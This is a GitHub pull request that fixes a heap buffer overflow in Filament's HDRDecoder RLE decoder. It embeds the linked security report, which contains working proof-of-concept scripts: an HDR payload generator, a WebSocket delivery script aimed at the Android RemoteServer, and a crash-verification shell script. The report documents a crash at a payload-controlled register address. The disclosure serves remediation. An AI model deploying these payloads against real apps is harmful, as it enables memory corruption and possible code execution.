### PR TITLE
Fix heap buffer overflow in HDRDecoder RLE decoding (Issue #9748)

### LINKED ISSUE #9748: [Security] Heap buffer overflow in HDRDecoder RLE decoder (RemoteServer)
## Details
Hello Team i found an heap buffer overflow vulnerability in Filament's HDRDecoder when processing Radiance HDR files with Run-Length Encoding (RLE). The decoder fails to enforce strict bounds checks while decompressing RLE chunks, allowing an attacker-controlled file to write beyond the allocated heap buffer for a scanline.

## Vulnerable Code Location

https://github.com/google/filament/blob/b58ffb87e0a41989b723d293673cbae65e0c8e59/libs/imageio/src/HDRDecoder.cpp#L128

Function: image::HDRDecoder::decode()

The vulnerability occurs in the RLE decoding loop where the num_bytes (representing the current horizontal position in a scanline) is incremented without checking if it exceeds the expected width.

```
// libs/imageio/src/HDRDecoder.cpp:128
while (num_bytes < width) {
    uint8_t rle_count;
    mStream.read((char*) &rle_count, 1);
    if (rle_count > 128) {
        char v;
        mStream.read(&v, 1);
        memset(d, v, size_t(rle_count - 128)); // <--- Heap Overflow here
        d += rle_count - 128;
        num_bytes += rle_count - 128;
    } else {
        // ... literal run logic
        mStream.read(d, rle_count); // <--- Or here
        d += rle_count;
        num_bytes += rle_count;
    }
}

```

### 1. Project Setup & Prerequisites

**Environment:**
- Host: macOS (for ASan verification and payload generation)
- Target: Android (Pixel 9 Pro / Emulator)
- Interconnect: WebSocket (Filament RemoteServer infrastructure)

**Fix Java Version (Android):** Modify `android/build.gradle` (approx. line 96):
```gradle
'jdk': 21,
```

**Environment Variables:**
```bash
export ANDROID_HOME=$HOME/Library/Android/sdk
export JAVA_HOME="/Applications/Android Studio.app/Contents/jbr/Contents/Home"
```

### 2. Build Instructions

**Build Host Tools with ASAN (Deterministic Proof):**
```bash
cmake -B out/cmake-debug -D FILAMENT_ENABLE_ASAN=ON -D CMAKE_BUILD_TYPE=Debug .
cmake --build out/cmake-debug --target cmgen
```

**Build Android Sample App:**
```bash
./build.sh -p android -q arm64-v8a -k sample-gltf-viewer debug
```

### 3. Exploit Preparation

**Generate the Malicious Payload:** Create `generate_poc.py` (see scripts below) with 1024-width and refined RLE framing, then run:
```bash
python3 generate_poc.py
```
This generates `attack.hdr`.

**Install and Setup Android Device:**
```bash
adb install -r android/samples/sample-gltf-viewer/build/outputs/apk/debug/sample-gltf-viewer-debug.apk
adb logcat -c
adb logcat "*:V" > exploit.log &
adb shell am start -n com.google.android.filament.gltf/com.google.android.filament.gltf.MainActivity
adb forward tcp:8082 tcp:8082
```

### 4. Execution & Validation

**Trigger Remote Exploit:**
```bash
python3 exploit_remote.py
```

**Verify Host-Side Overflow (ASAN):**
```bash
./out/cmake-debug/tools/cmgen/cmgen -f ktx -x ./out/output/ attack.hdr
```

**Verify Android-Side Crash (SIGSEGV):**
```bash
adb shell pidof com.google.android.filament.gltf || echo "APP_DIED"
adb pull /data/tombstones/tombstone_04 .
```

---

### Host-Side (ASan Proof)

Building with `-DFILAMENT_ENABLE_ASAN=ON` confirms a deterministic heap overflow:

```
SUMMARY: AddressSanitizer: heap-buffer-overflow HDRDecoder.cpp:134 in image::HDRDecoder::decode()
0x621000006100 is located 0 bytes after 1024-byte region [0x621000005d00, 0x621000006100)
```

### Android-Side (SIGSEGV Proof)

On the Pixel 9 Pro Emulator (Scudo Allocator), the exploit triggers a SIGSEGV with registers directly controlled by the payload:

**Tombstone Evidence (tombstone_04):**
- Signal: 11 (SIGSEGV), code 1 (SEGV_MAPERR)
- Fault Addr: `0x4242424242424246` (Controlled by payload)
- Controlled Register (x8): `0x4242424242424246` (Controlled by payload)

### generate_poc.py

```python

import struct

def generate_bad_hdr(filename):
    # Width 1024, height 2 (to increase pressure/overwrite)
    header = b"#?RADIANCE\nFORMAT=32-bit_rle_rgbe\n\n-Y 2 +X 1024\n"
    
    with open(filename, "wb") as f:
        f.write(header)
        
        for _ in range(2):
            # Precise scanline header: 0x02 0x02 followed by big-endian width (1024)
            # This is exactly what HDRDecoder expects.
            f.write(struct.pack(">BBH", 2, 2, 1024))
            
            # For each of the 4 channels (R, G, B, E)
            for _ in range(4):
                # 1. Fill with literal data up to 1022 bytes
                # 128 bytes chunks (max literal size)
                for _ in range(7):
                    f.write(bytes([128])) # literal count 128
                    f.write(bytes([0x41] * 128))
                # 128 * 7 = 896
                
                # Add another 126 to reach 1022
                f.write(bytes([126]))
                f.write(bytes([0x41] * 126))
                
                # 2. Final RLE run that pushes us past 1024
                # 0xFF -> 127 bytes.
                # Total = 1022 + 127 = 1149 bytes (Overflow by 125 bytes)
                f.write(bytes([0xFF, 0x43])) # 0x43 is 'C' for easy identification

if __name__ == "__main__":
    generate_bad_hdr("attack.hdr")
    print("attack.hdr with precise framing generated.")

```

### exploit_remote.py

```python

import asyncio
import websockets
import os

async def exploit():
    uri = "ws://localhost:8082"
    filename = "attack.hdr"
    
    if not os.path.exists(filename):
        print(f"Error: {filename} not found. Run generate_poc.py first.")
        return

    with open(filename, "rb") as f:
        content = f.read()

    try:
        # Keep a single WebSocket connection as requested
        async with websockets.connect(uri) as websocket:
            print("Connected to WebSocket.")
            
            # 20 iterations to pressure the heap
            for i in range(20):
                label = f"attack_{i}.hdr"
                print(f"Sending {label}...")
                
                # Part 1: Label
                await websocket.send(label)
                
                # Part 2: Buffer
                await websocket.send(content)
                
                # Small delay
                await asyncio.sleep(0.5)
            
            print("Exploit triggered. Check adb logcat for crash.")
    except Exception as e:
        print(f"Failed: {e}")

if __name__ == "__main__":
    asyncio.run(exploit())
Final Note
For the video POC i created automated bash script to show the demonstration here it is.

## POC.sh

```sh

#!/bin/bash
echo "[*] Generating malicious HDR payload..."
python3 generate_poc.py

# Skip clearing tombstones due to permission issues; we'll use ls -t instead.
# echo "[*] Cleaning up old logs and tombstones..."
# adb logcat -c

echo "[*] Starting Filament Android App..."
adb shell am force-stop com.google.android.filament.gltf
adb shell am start -n com.google.android.filament.gltf/com.google.android.filament.gltf.MainActivity
sleep 3

echo "[*] Forwarding WebSocket port 8082..."
adb forward tcp:8082 tcp:8082

echo "[*] Triggering Remote Exploit..."
./venv/bin/python3 exploit_remote.py

echo "[*] Waiting for crash (10 seconds for Scudo/RenderThread)..."
sleep 10

echo "[*] VERIFICATION RESULTS:"
PID=$(adb shell pidof com.google.android.filament.gltf)
if [ -z "$PID" ]; then
    echo "[-] SUCCESS: Application crashed!"
    
    echo "[*] Fetching Latest Tombstone..."
    LATEST_TOMB=$(adb shell "ls -t /data/tombstones/ | grep tombstone_ | head -n 1")
    
    if [ ! -z "$LATEST_TOMB" ]; then
        echo "[*] Found $LATEST_TOMB. Controlled register proof:"
        # Show Signal and Fault Address
        adb shell "head -n 25 /data/tombstones/$LATEST_TOMB | grep -E 'signal' | head -n 1"
        adb shell "head -n 25 /data/tombstones/$LATEST_TOMB | grep -E 'fault addr' | head -n 1"
        # Show registers containing the payload pattern (4141... or 4242...)
        echo "[*] Registers containing payload pattern:"
        adb shell "head -n 25 /data/tombstones/$LATEST_TOMB | grep -E '414141|424242'"
        
        echo ""
        echo "[*] Memory state proof (Scudo Primary):"
        # Search for the payload pattern in the first 200 lines of the tombstone
        adb shell "head -n 200 /data/tombstones/$LATEST_TOMB | grep -E '4141414141414141|4242424242424242' | head -n 5"
    else
        echo "[!] No tombstone found. Check 'adb logcat -d | grep Filament' for Scudo aborts."
    fi
else
    echo "[!] FAILED: Application still running (PID: $PID)."
    echo "[*] Check if forward is active: adb forward --list"
fi

```

5. Summary
Host (ASAN): Confirms 1024-byte buffer overflow in HDRDecoder::decode at line 134.
Android (SIGSEGV): Confirms remote arbitrary register control (e.g., x8, x19) and fault addr matching the payload bytes (e.g., 0x4242424242424242).
Attack scenario
Attacker Gain & Impact
Gain: Remote Code Execution (RCE).

Impact : An attacker can gain control over CPU registers and the instruction pointer's dependencies. In our reproduction, i demonstrated direct control over the fault addr and register x8 on an Android device (Pixel 9 Pro).

Any application using Filament to load external HDR textures (e.g., IBL environments, skyboxes) is vulnerable.

## Tools Used

- cmake / ninja (Build system)
- adb (Android Debug Bridge)
- Python 3 + websockets (Exploit delivery)
- ASan (AddressSanitizer for host verification)
- cmgen (Filament utility for host-side reproduction)

### PR DESCRIPTION
**Pull request by pixelflinger**
This commit addresses a critical security vulnerability (OOB write) and  several stability issues in the Radiance HDR parser.

Primary Fix:
* Fixed a heap buffer overflow in the RLE decoding loop (Issue #9748).  The decoder previously failed to verify if a run-length chunk exceeded  the remaining space in the scanline buffer. Added strict bounds checking  (`num_bytes + run_length > width`) before executing `memset` or  `mStream.read` to prevent arbitrary memory corruption.

Additional Security & Stability Improvements:
* Prevented an infinite loop (DoS) in header parsing. Replaced the  `do { ... } while(true);` loop with proper stream state checking  (`while (mStream.getline(...))`) to handle unexpected EOFs gracefully.
* Mitigated integer overflow and Out-Of-Memory (OOM) vulnerabilities by  enforcing maximum sane dimensions (`MAX_IMAGE_DIMENSION` and  `MAX_IMAGE_PIXELS`). This prevents catastrophic memory allocations  triggered by maliciously crafted width/height values.
* Initialized local variables and buffers (`buf`, `gamma`, `exposure`) to  prevent undefined behavior and parsing of stack garbage upon stream read  failures.

Fixes #9748

### CODE REVIEW

File: libs/imageio/src/HDRDecoder.cpp [hunk 1]
```diff
@@ -59,31 +63,46 @@ HDRDecoder::HDRDecoder(std::istream& stream)
...
             if ((sscanf(buf, "%cY %u %cX %u", &sy, &height, &sx, &width) == 4)||   // NOLINT
                 (sscanf(buf, "%cX %u %cY %u", &sx, &width, &sy, &height) == 4)) {  // NOLINT
                 break;
             }
-        } while (true);
+        }
+
+        // Verify that dimensions were successfully found before proceeding
+        if (width == 0 || height == 0) {
+            slog.e << "Invalid or missing image dimensions" << io::endl;
```
Comment (poweifeng) [inline libs/imageio/src/HDRDecoder.cpp:87]: prefer `LOG(ERROR)` here and elsewhere.

Comment (pixelflinger) [reply libs/imageio/src/HDRDecoder.cpp:87]: yes, I didn't want to change that in the file in this PR.
